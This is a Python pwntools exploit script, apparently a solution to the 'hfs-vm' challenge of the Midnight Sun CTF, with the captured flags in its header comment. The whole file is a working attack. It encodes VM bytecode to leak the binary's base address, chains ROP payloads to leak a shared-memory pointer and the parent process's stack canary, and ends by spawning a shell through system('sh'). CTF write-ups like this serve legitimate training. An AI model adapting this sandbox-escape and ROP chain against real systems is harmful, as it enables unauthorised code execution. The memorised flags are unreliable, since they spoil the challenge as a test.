#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

"""
instruction encoding (low to hi):
    low word:
        5 bits: instr type
        4 bits: 1st operand
        4 bits: 2nd operand (reg)
        1 bit:  reg (0) / imm (1)
    hi word: 2nd operand (imm)

flags:
    midnight{m3_h4bl0_vm}
    midnight{7h3re5_n0_I_iN_VM_bu7_iF_th3r3_w@s_1t_w0uld_b3_VIM}
"""

pop_rdi = 0x1e83
pop_rsi = 0x198f
pop_rdx = 0x101d
pop_rsp = 0x1112
gadget_ret = 0xe29

off_shared_mem = 0x203100
off_second_chain = 0x203b00

parent_fd = 6 if args.REMOTE else 3


def exploit():
    global g, binary
    if args.REMOTE:
        g = remote('hfs-vm-01.play.midnightsunctf.se', 4096)
    else:
        g = process('hfs-vm')
    binary = ELF('hfs-vm')
    context.binary = binary

    rop = gen_rop()
    info("ROP:\n%s", hexdump(''.join(p64(val) for val, rel in rop)))
    bytecode = gen_bytecode(rop)
    info("BC:\n%s", hexdump(bytecode))

    # send bytecode
    g.sendlineafter('length: ', str(len(bytecode)))
    g.sendafter('code: ', bytecode)
    g.recvuntil('in sandbox')

    # leak binary
    g.recvuntil('REG_01: ')
    r1 = int(g.recvuntil('\n', drop=True), 0)
    g.recvuntil('REG_02: ')
    r2 = int(g.recvuntil('\n', drop=True), 0)
    g.recvuntil('REG_03: ')
    r3 = int(g.recvuntil('\n', drop=True), 0)
    g.recvuntil('REG_04: ')
    r4 = int(g.recvuntil('\n', drop=True), 0)
    g.recvuntil('=====\n')
    binary.address = r1 | (r2 << 16) | (r3 << 32) | (r4 << 48)

    # second rop chain to leak shared_mem pointer
    rop = ROP(binary)
    rop.write(1, binary.address + off_shared_mem, 8)
    rop.read(0, binary.address + off_second_chain, 0x500)
    rop.raw(binary.address + pop_rsp)
    rop.raw(binary.address + off_second_chain)
    info("2nd ROP:\n%s", rop.dump())
    g.send(rop.chain())
    # leak pointer
    shared_mem = u64(g.recvn(8))
    info("shared_mem @ 0x%x", shared_mem)

    # third rop chain

    rop = ROP(binary)
    rop_data = ''
    rop_data_addr = binary.address + off_second_chain + 0x200

    # trigger sys_random(4)
    rop.write(parent_fd, rop_data_addr, 5)
    rop_data += data_sys(4, 4)
    # overwrite shared_mem size
    rop.read(0, shared_mem, 2)
    # dummy read, just for waiting a bit
    rop.read(0, shared_mem, 2)
    # leak parent stack canary
    rop.write(1, shared_mem + 74, 8)
    # read rop chain for parent to shared_mem
    rop.read(0, shared_mem, 0x1000)
    # trigger rop in parent, via sys_ls()
    rop.write(parent_fd, rop_data_addr + len(rop_data), 5)
    rop_data += data_sys(6)
    # exit
    rop.exit(0)

    # send 3rd chain
    info("3rd ROP:\n%s", rop.dump())
    g.send(rop.chain().ljust(0x200, '\0') + rop_data)

    # interact with 3rd chain
    # sleep to wait for kernel to enter sys_random()
    sleep(1)
    # overwrite shared_mem size
    g.send(p16(80))
    # wait for kernel to copy canary
    sleep(6)
    g.send(p16(80))
    # read parent stack canary
    canary = g.recvn(8)
    info("parent canary: %s", enhex(canary))

    # send parent rop chain
    rop = ROP(binary)
    rop.system(shared_mem + 0x300)
    info("parent ROP:\n%s", rop.dump())
    chain = 'A' * 72 + canary + 'B' * 40 + p64(binary.address + gadget_ret) * 1 + rop.chain()
    g.send((p16(len(chain)) + chain).ljust(0x300, '\0') + 'sh\0')

    g.interactive()


def gen_bytecode(rop):
    bc = ''

    # set regs 1, 2, 3, 4 to ret addr (4 is not touched, because always zero)
    bc += mov_rs(1, 52)
    bc += mov_rs(2, 53)
    bc += mov_rs(3, 54)
    # adjust regs to base addr
    bc += sub_ri(1, 0xe6e)
    # debug to leak base addr
    bc += p32(0xa)

    idx = 52
    for val, rel in rop:
        if rel:
            # set regs 5, 6, 7, 8 to val
            bc += mov_ri(5, val & 0xffff)
            bc += mov_ri(6, (val >> 16) & 0xffff)
            bc += mov_ri(7, (val >> 32) & 0xffff)
            bc += mov_ri(8, (val >> 48) & 0xffff)
            # add base addr
            bc += add_rr(5, 1)
            bc += add_rr(6, 2)
            bc += add_rr(7, 3)
            # write to stack
            bc += mov_sr(idx, 5)
            bc += mov_sr(idx + 1, 6)
            bc += mov_sr(idx + 2, 7)
            bc += mov_sr(idx + 3, 8)
        else:
            # write to stack
            bc += mov_si(idx, val & 0xffff)
            bc += mov_si(idx + 1, (val >> 16) & 0xffff)
            bc += mov_si(idx + 2, (val >> 32) & 0xffff)
            bc += mov_si(idx + 3, (val >> 48) & 0xffff)
        idx += 4

    return bc


def gen_rop():
    # gadgets encoded as tuples
    # the first element is the gadget/address
    # the second element indicates if the address is relative to the binary's base
    return (
        # read(0, data + 0xa00, 0xe00)
        (pop_rdi, True),
        (0, False),
        (pop_rsi, True),
        (0x203000 + 0xa00, True),
        (pop_rdx, True),
        (0xe00, False),
        (binary.plt.read, True),
        # rsp = data + 0xa00
        (pop_rsp, True),
        (0x203000 + 0xa00, True),
    )


def instr(type, is_imm, imm=0, reg1=0, reg2=0):
    return p16(type | (reg1 << 5) | (reg2 << 9) | (is_imm << 13)) + p16(imm)


def mov_ri(reg, imm):
    return instr(0, 1, reg1=reg, imm=imm)


def add_ri(reg, imm):
    return instr(1, 1, reg1=reg, imm=imm)


def add_rr(reg1, reg2):
    return instr(1, 0, reg1=reg1, reg2=reg2)


def sub_ri(reg, imm):
    return instr(2, 1, reg1=reg, imm=imm)


def mov_rs(reg, idx):
    return mov_ri(0, idx) + instr(8, 0, reg1=reg, reg2=0)


def mov_sr(idx, reg):
    return mov_ri(0, idx) + instr(7, 0, reg1=0, reg2=reg)


def mov_si(idx, imm):
    return mov_ri(0, idx) + instr(7, 1, reg1=0, imm=imm)


def data_sys(num, arg1=0, arg2=0):
    return p8(num) + p16(arg1) + p16(arg2)


if __name__ == '__main__':
    exploit()
